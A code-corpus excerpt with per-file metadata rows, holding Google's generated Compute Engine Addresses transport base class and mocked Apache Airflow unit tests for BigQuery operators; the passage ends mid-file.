f(a=1)
| 24.459064 | 80 | 0.562941 | [
"MIT"
] | jacobunna/argcomb | test.py | 8,368 | Python |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.compute_v1.types import compute
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-compute",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class AddressesTransport(abc.ABC):
"""Abstract transport class for Addresses."""
AUTH_SCOPES = (
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
)
def __init__(
self,
*,
host: str = "compute.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: typing.Optional[str] = None,
scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
quota_project_id: typing.Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scope (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = auth.load_credentials_from_file(
credentials_file, scopes=scopes, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = auth.default(
scopes=scopes, quota_project_id=quota_project_id
)
# Save the credentials.
self._credentials = credentials
# Lifted into its own function so it can be stubbed out during tests.
self._prep_wrapped_messages(client_info)
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.aggregated_list: gapic_v1.method.wrap_method(
self.aggregated_list, default_timeout=None, client_info=client_info,
),
self.delete: gapic_v1.method.wrap_method(
self.delete, default_timeout=None, client_info=client_info,
),
self.get: gapic_v1.method.wrap_method(
self.get, default_timeout=None, client_info=client_info,
),
self.insert: gapic_v1.method.wrap_method(
self.insert, default_timeout=None, client_info=client_info,
),
self.list: gapic_v1.method.wrap_method(
self.list, default_timeout=None, client_info=client_info,
),
}
@property
def aggregated_list(
self,
) -> typing.Callable[
[compute.AggregatedListAddressesRequest],
typing.Union[
compute.AddressAggregatedList,
typing.Awaitable[compute.AddressAggregatedList],
],
]:
raise NotImplementedError()
@property
def delete(
self,
) -> typing.Callable[
[compute.DeleteAddressRequest],
typing.Union[compute.Operation, typing.Awaitable[compute.Operation]],
]:
raise NotImplementedError()
@property
def get(
self,
) -> typing.Callable[
[compute.GetAddressRequest],
typing.Union[compute.Address, typing.Awaitable[compute.Address]],
]:
raise NotImplementedError()
@property
def insert(
self,
) -> typing.Callable[
[compute.InsertAddressRequest],
typing.Union[compute.Operation, typing.Awaitable[compute.Operation]],
]:
raise NotImplementedError()
@property
def list(
self,
) -> typing.Callable[
[compute.ListAddressesRequest],
typing.Union[compute.AddressList, typing.Awaitable[compute.AddressList]],
]:
raise NotImplementedError()
__all__ = ("AddressesTransport",)
| 35.254237 | 86 | 0.646635 | [
"Apache-2.0"
] | igor-solomatov/python-compute | google/cloud/compute_v1/services/addresses/transports/base.py | 6,240 | Python |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
from unittest.mock import MagicMock
import pytest
from google.cloud.exceptions import Conflict
from airflow.exceptions import AirflowException
from airflow.models import DAG
from airflow.providers.google.cloud.operators.bigquery import (
BigQueryCheckOperator,
BigQueryConsoleIndexableLink,
BigQueryConsoleLink,
BigQueryCreateEmptyDatasetOperator,
BigQueryCreateEmptyTableOperator,
BigQueryCreateExternalTableOperator,
BigQueryDeleteDatasetOperator,
BigQueryDeleteTableOperator,
BigQueryExecuteQueryOperator,
BigQueryGetDataOperator,
BigQueryGetDatasetOperator,
BigQueryGetDatasetTablesOperator,
BigQueryInsertJobOperator,
BigQueryIntervalCheckOperator,
BigQueryPatchDatasetOperator,
BigQueryUpdateDatasetOperator,
BigQueryUpdateTableOperator,
BigQueryUpdateTableSchemaOperator,
BigQueryUpsertTableOperator,
BigQueryValueCheckOperator,
)
from airflow.serialization.serialized_objects import SerializedDAG
from airflow.utils.timezone import datetime
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags, clear_db_xcom
TASK_ID = 'test-bq-generic-operator'
TEST_DATASET = 'test-dataset'
TEST_DATASET_LOCATION = 'EU'
TEST_GCP_PROJECT_ID = 'test-project'
TEST_DELETE_CONTENTS = True
TEST_TABLE_ID = 'test-table-id'
TEST_GCS_BUCKET = 'test-bucket'
TEST_GCS_DATA = ['dir1/*.csv']
TEST_SOURCE_FORMAT = 'CSV'
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'test-bigquery-operators'
TEST_TABLE_RESOURCES = {"tableReference": {"tableId": TEST_TABLE_ID}, "expirationTime": 1234567}
VIEW_DEFINITION = {
"query": f"SELECT * FROM `{TEST_DATASET}.{TEST_TABLE_ID}`",
"useLegacySql": False,
}
MATERIALIZED_VIEW_DEFINITION = {
'query': f'SELECT product, SUM(amount) FROM `{TEST_DATASET}.{TEST_TABLE_ID}` GROUP BY product',
'enableRefresh': True,
'refreshIntervalMs': 2000000,
}
class TestBigQueryCreateEmptyTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, table_id=TEST_TABLE_ID
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=None,
time_partitioning={},
cluster_fields=None,
labels=None,
view=None,
materialized_view=None,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_create_view(self, mock_hook):
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
view=VIEW_DEFINITION,
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=None,
time_partitioning={},
cluster_fields=None,
labels=None,
view=VIEW_DEFINITION,
materialized_view=None,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_create_materialized_view(self, mock_hook):
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
materialized_view=MATERIALIZED_VIEW_DEFINITION,
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=None,
time_partitioning={},
cluster_fields=None,
labels=None,
view=None,
materialized_view=MATERIALIZED_VIEW_DEFINITION,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_create_clustered_empty_table(self, mock_hook):
schema_fields = [
{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
{"name": "date_hired", "type": "DATE", "mode": "REQUIRED"},
{"name": "date_birth", "type": "DATE", "mode": "NULLABLE"},
]
time_partitioning = {"type": "DAY", "field": "date_hired"}
cluster_fields = ["date_birth"]
operator = BigQueryCreateEmptyTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=schema_fields,
time_partitioning=time_partitioning,
cluster_fields=cluster_fields,
)
operator.execute(None)
mock_hook.return_value.create_empty_table.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
table_id=TEST_TABLE_ID,
schema_fields=schema_fields,
time_partitioning=time_partitioning,
cluster_fields=cluster_fields,
labels=None,
view=None,
materialized_view=None,
encryption_configuration=None,
table_resource=None,
exists_ok=False,
)
class TestBigQueryCreateExternalTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryCreateExternalTableOperator(
task_id=TASK_ID,
destination_project_dataset_table=f'{TEST_DATASET}.{TEST_TABLE_ID}',
schema_fields=[],
bucket=TEST_GCS_BUCKET,
source_objects=TEST_GCS_DATA,
source_format=TEST_SOURCE_FORMAT,
)
operator.execute(None)
mock_hook.return_value.create_external_table.assert_called_once_with(
external_project_dataset_table=f'{TEST_DATASET}.{TEST_TABLE_ID}',
schema_fields=[],
source_uris=[f'gs://{TEST_GCS_BUCKET}/{source_object}' for source_object in TEST_GCS_DATA],
source_format=TEST_SOURCE_FORMAT,
compression='NONE',
skip_leading_rows=0,
field_delimiter=',',
max_bad_records=0,
quote_character=None,
allow_quoted_newlines=False,
allow_jagged_rows=False,
src_fmt_configs={},
labels=None,
encryption_configuration=None,
)
class TestBigQueryDeleteDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryDeleteDatasetOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
delete_contents=TEST_DELETE_CONTENTS,
)
operator.execute(None)
mock_hook.return_value.delete_dataset.assert_called_once_with(
dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, delete_contents=TEST_DELETE_CONTENTS
)
class TestBigQueryCreateEmptyDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryCreateEmptyDatasetOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
location=TEST_DATASET_LOCATION,
)
operator.execute(None)
mock_hook.return_value.create_empty_dataset.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
location=TEST_DATASET_LOCATION,
dataset_reference={},
exists_ok=False,
)
class TestBigQueryGetDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryGetDatasetOperator(
task_id=TASK_ID, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID
)
operator.execute(None)
mock_hook.return_value.get_dataset.assert_called_once_with(
dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID
)
class TestBigQueryUpdateTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
table_resource = {"friendlyName": 'Test TB'}
operator = BigQueryUpdateTableOperator(
table_resource=table_resource,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.update_table.assert_called_once_with(
table_resource=table_resource,
fields=None,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
class TestBigQueryUpdateTableSchemaOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
schema_field_updates = [
{
'name': 'emp_name',
'description': 'Name of employee',
}
]
operator = BigQueryUpdateTableSchemaOperator(
schema_fields_updates=schema_field_updates,
include_policy_tags=False,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.update_table_schema.assert_called_once_with(
schema_fields_updates=schema_field_updates,
include_policy_tags=False,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
project_id=TEST_GCP_PROJECT_ID,
)
class TestBigQueryPatchDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
dataset_resource = {"friendlyName": 'Test DS'}
operator = BigQueryPatchDatasetOperator(
dataset_resource=dataset_resource,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.patch_dataset.assert_called_once_with(
dataset_resource=dataset_resource, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID
)
class TestBigQueryUpdateDatasetOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
dataset_resource = {"friendlyName": 'Test DS'}
operator = BigQueryUpdateDatasetOperator(
dataset_resource=dataset_resource,
task_id=TASK_ID,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.update_dataset.assert_called_once_with(
dataset_resource=dataset_resource,
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
fields=list(dataset_resource.keys()),
)
class TestBigQueryOperator:
def teardown_method(self):
clear_db_xcom()
clear_db_runs()
clear_db_serialized_dags()
clear_db_dags()
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
encryption_configuration = {'key': 'kk'}
operator = BigQueryExecuteQueryOperator(
task_id=TASK_ID,
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
gcp_conn_id='google_cloud_default',
udf_config=None,
use_legacy_sql=True,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=encryption_configuration,
)
operator.execute(MagicMock())
mock_hook.return_value.run_query.assert_called_once_with(
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=encryption_configuration,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_list(self, mock_hook):
operator = BigQueryExecuteQueryOperator(
task_id=TASK_ID,
sql=[
'Select * from test_table',
'Select * from other_test_table',
],
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
gcp_conn_id='google_cloud_default',
udf_config=None,
use_legacy_sql=True,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
)
operator.execute(MagicMock())
mock_hook.return_value.run_query.assert_has_calls(
[
mock.call(
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
),
mock.call(
sql='Select * from other_test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
),
]
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_bad_type(self, mock_hook):
operator = BigQueryExecuteQueryOperator(
task_id=TASK_ID,
sql=1,
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
gcp_conn_id='google_cloud_default',
udf_config=None,
use_legacy_sql=True,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=(),
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
)
with pytest.raises(AirflowException):
operator.execute(MagicMock())
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_defaults(self, mock_hook, create_task_instance_of_operator):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
task_id=TASK_ID,
sql='Select * from test_table',
schema_update_options=None,
)
operator = ti.task
operator.execute(MagicMock())
mock_hook.return_value.run_query.assert_called_once_with(
sql='Select * from test_table',
destination_dataset_table=None,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
flatten_results=None,
udf_config=None,
maximum_billing_tier=None,
maximum_bytes_billed=None,
create_disposition='CREATE_IF_NEEDED',
schema_update_options=None,
query_params=None,
labels=None,
priority='INTERACTIVE',
time_partitioning=None,
api_resource_configs=None,
cluster_fields=None,
encryption_configuration=None,
)
assert isinstance(operator.sql, str)
ti.render_templates()
assert isinstance(ti.task.sql, str)
@pytest.mark.need_serialized_dag
def test_bigquery_operator_extra_serialized_field_when_single_query(
self,
dag_maker,
create_task_instance_of_operator,
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql='SELECT * FROM test_table',
)
serialized_dag = dag_maker.get_serialized_data()
assert "sql" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict[TASK_ID]
assert getattr(simple_task, "sql") == 'SELECT * FROM test_table'
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'airflow.providers.google.cloud.operators.bigquery.BigQueryConsoleLink': {}}
]
# Check DeSerialized version of operator link
assert isinstance(list(simple_task.operator_extra_links)[0], BigQueryConsoleLink)
ti.xcom_push('job_id', 12345)
url = simple_task.get_extra_links(ti, BigQueryConsoleLink.name)
assert url == 'https://console.cloud.google.com/bigquery?j=12345'
@pytest.mark.need_serialized_dag
def test_bigquery_operator_extra_serialized_field_when_multiple_queries(
self,
dag_maker,
create_task_instance_of_operator,
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql=['SELECT * FROM test_table', 'SELECT * FROM test_table2'],
)
serialized_dag = dag_maker.get_serialized_data()
assert "sql" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict[TASK_ID]
assert getattr(simple_task, "sql") == ['SELECT * FROM test_table', 'SELECT * FROM test_table2']
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'airflow.providers.google.cloud.operators.bigquery.BigQueryConsoleIndexableLink': {'index': 0}},
{'airflow.providers.google.cloud.operators.bigquery.BigQueryConsoleIndexableLink': {'index': 1}},
]
# Check DeSerialized version of operator link
assert isinstance(list(simple_task.operator_extra_links)[0], BigQueryConsoleIndexableLink)
job_id = ['123', '45']
ti.xcom_push(key='job_id', value=job_id)
assert {'BigQuery Console #1', 'BigQuery Console #2'} == simple_task.operator_extra_link_dict.keys()
assert 'https://console.cloud.google.com/bigquery?j=123' == simple_task.get_extra_links(
ti, 'BigQuery Console #1'
)
assert 'https://console.cloud.google.com/bigquery?j=45' == simple_task.get_extra_links(
ti, 'BigQuery Console #2'
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_extra_link_when_missing_job_id(
self, mock_hook, create_task_instance_of_operator
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
task_id=TASK_ID,
sql='SELECT * FROM test_table',
)
bigquery_task = ti.task
assert '' == bigquery_task.get_extra_links(ti, BigQueryConsoleLink.name)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_extra_link_when_single_query(
self, mock_hook, create_task_instance_of_operator
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql='SELECT * FROM test_table',
)
bigquery_task = ti.task
job_id = '12345'
ti.xcom_push(key='job_id', value=job_id)
assert f'https://console.cloud.google.com/bigquery?j={job_id}' == bigquery_task.get_extra_links(
ti, BigQueryConsoleLink.name
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_bigquery_operator_extra_link_when_multiple_query(
self, mock_hook, create_task_instance_of_operator
):
ti = create_task_instance_of_operator(
BigQueryExecuteQueryOperator,
dag_id=TEST_DAG_ID,
execution_date=DEFAULT_DATE,
task_id=TASK_ID,
sql=['SELECT * FROM test_table', 'SELECT * FROM test_table2'],
)
bigquery_task = ti.task
job_id = ['123', '45']
ti.xcom_push(key='job_id', value=job_id)
assert {'BigQuery Console #1', 'BigQuery Console #2'} == bigquery_task.operator_extra_link_dict.keys()
assert 'https://console.cloud.google.com/bigquery?j=123' == bigquery_task.get_extra_links(
ti, 'BigQuery Console #1'
)
assert 'https://console.cloud.google.com/bigquery?j=45' == bigquery_task.get_extra_links(
ti, 'BigQuery Console #2'
)
class TestBigQueryGetDataOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
max_results = 100
selected_fields = 'DATE'
operator = BigQueryGetDataOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
max_results=max_results,
selected_fields=selected_fields,
location=TEST_DATASET_LOCATION,
)
operator.execute(None)
mock_hook.return_value.list_rows.assert_called_once_with(
dataset_id=TEST_DATASET,
table_id=TEST_TABLE_ID,
max_results=max_results,
selected_fields=selected_fields,
location=TEST_DATASET_LOCATION,
)
class TestBigQueryTableDeleteOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
ignore_if_missing = True
deletion_dataset_table = f'{TEST_DATASET}.{TEST_TABLE_ID}'
operator = BigQueryDeleteTableOperator(
task_id=TASK_ID,
deletion_dataset_table=deletion_dataset_table,
ignore_if_missing=ignore_if_missing,
)
operator.execute(None)
mock_hook.return_value.delete_table.assert_called_once_with(
table_id=deletion_dataset_table, not_found_ok=ignore_if_missing
)
class TestBigQueryGetDatasetTablesOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryGetDatasetTablesOperator(
task_id=TASK_ID, dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, max_results=2
)
operator.execute(None)
mock_hook.return_value.get_dataset_tables.assert_called_once_with(
dataset_id=TEST_DATASET,
project_id=TEST_GCP_PROJECT_ID,
max_results=2,
)
@pytest.mark.parametrize(
"operator_class, kwargs",
[
(BigQueryCheckOperator, dict(sql='Select * from test_table')),
(BigQueryValueCheckOperator, dict(sql='Select * from test_table', pass_value=95)),
(BigQueryIntervalCheckOperator, dict(table=TEST_TABLE_ID, metrics_thresholds={'COUNT(*)': 1.5})),
],
)
class TestBigQueryCheckOperators:
@mock.patch("airflow.providers.google.cloud.operators.bigquery._BigQueryDbHookMixin.get_db_hook")
def test_get_db_hook(
self,
mock_get_db_hook,
operator_class,
kwargs,
):
operator = operator_class(task_id=TASK_ID, gcp_conn_id='google_cloud_default', **kwargs)
operator.get_db_hook()
mock_get_db_hook.assert_called_once()
class TestBigQueryConnIdDeprecationWarning:
@pytest.mark.parametrize(
"operator_class, kwargs",
[
(BigQueryCheckOperator, dict(sql='Select * from test_table')),
(BigQueryValueCheckOperator, dict(sql='Select * from test_table', pass_value=95)),
(BigQueryIntervalCheckOperator, dict(table=TEST_TABLE_ID, metrics_thresholds={'COUNT(*)': 1.5})),
(BigQueryGetDataOperator, dict(dataset_id=TEST_DATASET, table_id=TEST_TABLE_ID)),
(BigQueryExecuteQueryOperator, dict(sql='Select * from test_table')),
(BigQueryDeleteDatasetOperator, dict(dataset_id=TEST_DATASET)),
(BigQueryCreateEmptyDatasetOperator, dict(dataset_id=TEST_DATASET)),
(BigQueryDeleteTableOperator, dict(deletion_dataset_table=TEST_DATASET)),
],
)
def test_bigquery_conn_id_deprecation_warning(self, operator_class, kwargs):
bigquery_conn_id = 'google_cloud_default'
with pytest.warns(
DeprecationWarning,
match=(
"The bigquery_conn_id parameter has been deprecated. "
"You should pass the gcp_conn_id parameter."
),
):
operator = operator_class(task_id=TASK_ID, bigquery_conn_id=bigquery_conn_id, **kwargs)
assert bigquery_conn_id == operator.gcp_conn_id
class TestBigQueryUpsertTableOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute(self, mock_hook):
operator = BigQueryUpsertTableOperator(
task_id=TASK_ID,
dataset_id=TEST_DATASET,
table_resource=TEST_TABLE_RESOURCES,
project_id=TEST_GCP_PROJECT_ID,
)
operator.execute(None)
mock_hook.return_value.run_table_upsert.assert_called_once_with(
dataset_id=TEST_DATASET, project_id=TEST_GCP_PROJECT_ID, table_resource=TEST_TABLE_RESOURCES
)
class TestBigQueryInsertJobOperator:
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_execute_success(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value = MagicMock(job_id=real_job_id, error_result=False)
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
)
result = op.execute({})
mock_hook.return_value.insert_job.assert_called_once_with(
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=real_job_id,
project_id=TEST_GCP_PROJECT_ID,
)
assert result == real_job_id
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
@mock.patch('airflow.providers.google.cloud.operators.bigquery.BigQueryHook')
def test_on_kill(self, mock_hook, mock_md5):
job_id = "123456"
hash_ = "hash"
real_job_id = f"{job_id}_{hash_}"
mock_md5.return_value.hexdigest.return_value = hash_
configuration = {
"query": {
"query": "SELECT * FROM any",
"useLegacySql": False,
}
}
mock_hook.return_value.insert_job.return_value = MagicMock(job_id=real_job_id, error_result=False)
op = BigQueryInsertJobOperator(
task_id="insert_query_job",
configuration=configuration,
location=TEST_DATASET_LOCATION,
job_id=job_id,
project_id=TEST_GCP_PROJECT_ID,
cancel_on_kill=False,
)
op.execute({})
op.on_kill()
mock_hook.return_value.cancel_job.assert_not_called()
op.cancel_on_kill = True
op.on_kill()
mock_hook.return_value.cancel_job.assert_called_once_with(
job_id=real_job_id,
location=TEST_DATASET_LOCATION,
project_id=TEST_GCP_PROJECT_ID,
)
@mock.patch('airflow.providers.google.cloud.operators.bigquery.hashlib.md5')
